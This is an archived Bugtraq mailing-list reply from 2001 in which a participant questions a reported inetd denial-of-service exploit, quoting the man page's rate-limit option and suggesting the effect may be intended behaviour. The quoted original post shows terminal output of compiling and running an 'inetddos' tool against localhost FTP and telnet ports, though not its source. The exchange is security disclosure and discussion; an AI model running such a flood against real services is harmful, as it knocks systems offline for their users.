Bugtraq mailing list archives
Re: inetd DoS exploit
From: Peter Werner <peterw () DOCUMENTA COM AU>
Date: Tue, 27 Feb 2001 09:39:06 +1100
NAME inetd - internet ``super-server'' SYNOPSIS inetd [-d] [-R rate] [configuration file] .... -R rate Specify the maximum number of times a service can be invoked in one minute; the default is 256. isnt this a feature of inetd? ie, it stops answering request's for a service when the maximum number has been reached? did you wait ~10 minutes to try reconnect? or does inetd/box actually need to be restarted? ----- Original Message ----- From: Serega[linux] <linux () IHGROUP RU> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Monday, February 26, 2001 3:26 AM Subject: [BUGTRAQ] inetd DoS exploit
Name: inetd DoS exploit Author: Serega[Linux] [ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner
*/
Open ports on [127.0.0.1] ----------------------------- [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat
Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN : [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun,
25 Feb 2001 18:58:36 +0300
----------------------------- [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17
15:10:44 MSK 2001) ready.
[ser@ihg prog]$ cc inetddos.c -o inetddos [ser@ihg prog]$ ./inetddos 127.0.0.1 21 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. login: [ser@ihg prog]$ ./inetddos 127.0.0.1 23 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused -- /* * mailto:linux () ihgroup ru * ICQ: 64432299 * Home Page: http://127.0.0.1 */
Current thread:
- inetd DoS exploit Serega[linux] (Feb 26)
- Re: inetd DoS exploit Jose Nazario (Feb 27)
- Re: inetd DoS exploit David Malone (Feb 27)
- Re: inetd DoS exploit Charles M. Hannum (Feb 27)
- Re: inetd DoS exploit Peter Werner (Feb 27)
- Re: inetd DoS exploit Peter van Dijk (Feb 27)
- ratelimiting/concurrency limits both inadequate to stop TCP/IP DoS bert hubert (Feb 28)
- Re: inetd DoS exploit Jose Nazario (Feb 27)